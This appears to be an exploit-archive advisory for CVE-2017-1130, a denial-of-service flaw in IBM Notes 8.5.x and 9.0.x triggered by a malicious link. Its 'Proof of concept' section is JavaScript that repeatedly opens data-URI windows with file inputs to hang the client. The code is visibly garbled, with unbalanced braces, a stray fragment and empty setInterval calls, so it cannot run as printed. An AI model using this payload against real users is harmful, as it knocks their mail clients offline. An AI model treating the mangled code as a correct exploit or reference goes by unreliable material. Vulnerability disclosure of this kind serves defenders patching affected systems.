IBM Notes 8.5.x / 9.0.x Denial Of Service

IBM Notes versions 8.5.x and 9.0.x suffer from a denial of service vulnerability.

MD5 | 5962a5618ef528d19dbaa50818de00f6

# Exploit Title: IBM Notes is affected by a denial of service vulnerability
# Date: 31 August 2017
# Software Link:
# Exploit Author: Dhiraj Mishra
# Contact:
# Website:
# CVE: CVE-2017-1130
# Category: IBM Notes (Console Application)

1. Description

IBM Notes is vulnerable to a denial of service involving persuading a user to click on a malicious link, which would ultimately cause the client to have to be restarted.

2. Proof of concept

var w;
var wins = {};
var i = 1;;
setInterval("", 1);
for (var k in wins) {
// after creating window .status = '' (empty string), when the file dialog is displayed its value changes to 'undefined'.
if (wins[k] && wins[k].status === undefined) {
delete wins[k];
w = open('data:text/html,<input type=file id=f><script>;setInterval("", 1);<\/script>');
if (w) {
wins[i] = w;
}, 1);

3. IBM Security Bulletin

Related Posts